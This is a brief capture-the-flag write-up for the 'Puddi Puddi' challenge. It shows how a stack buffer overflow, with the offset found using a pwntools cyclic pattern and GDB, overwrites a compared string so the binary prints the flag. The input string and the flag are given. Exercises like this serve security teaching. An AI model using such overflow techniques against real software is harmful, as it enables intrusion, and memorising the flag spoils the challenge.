Puddi Puddi

Why have a MEGA 🍮 when you can have a GIGA 🍮?

Files given:


We see that it moves the string MEGA to rbp-0x5 and then after receiving a user input, checks if rbp-0x5 is GIGA. This is simply asking for buffer overflow!

Instead of staring at the binary, we can overflow it wih pwntools cyclic(100) and then use GDB and break at strcmp to check what the value of rbp-0x5 is, and with this compute the padding needed.

strcmp@plt (
   $rdi = 0x00007fffffffe6cb → "alaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaax[...]",
   $rsi = 0x0000555555400da8 → 0x706f4f0041474947 ("GIGA"?),
   $rdx = 0x0000000000000000
>>> cyclic_find("alaa")

Hence we simply send in pattern(43)+"GIGA" as input to get the flag:

Do you like pudding? (Y/N) => aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaGIGA

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888    888   888   888    888      d88P888       888    888 888     888 888    888 888    888  888   888
888          888   888            d88P 888       888   d88P 888     888 888    888 888    888  888   888
888  88888   888   888  88888    d88P  888       8888888P"  888     888 888    888 888    888  888   888
888    888   888   888    888   d88P   888       888        888     888 888    888 888    888  888   Y8P
Y88b  d88P   888   Y88b  d88P  d8888888888       888        Y88b. .d88P 888  .d88P 888  .d88P  888    "
 "Y8888P88 8888888  "Y8888P88 d88P     888       888         "Y88888P"  8888888P"  8888888P" 8888888 888


Flag: WH2021{3880fba0faf0_g1g4_pudd1}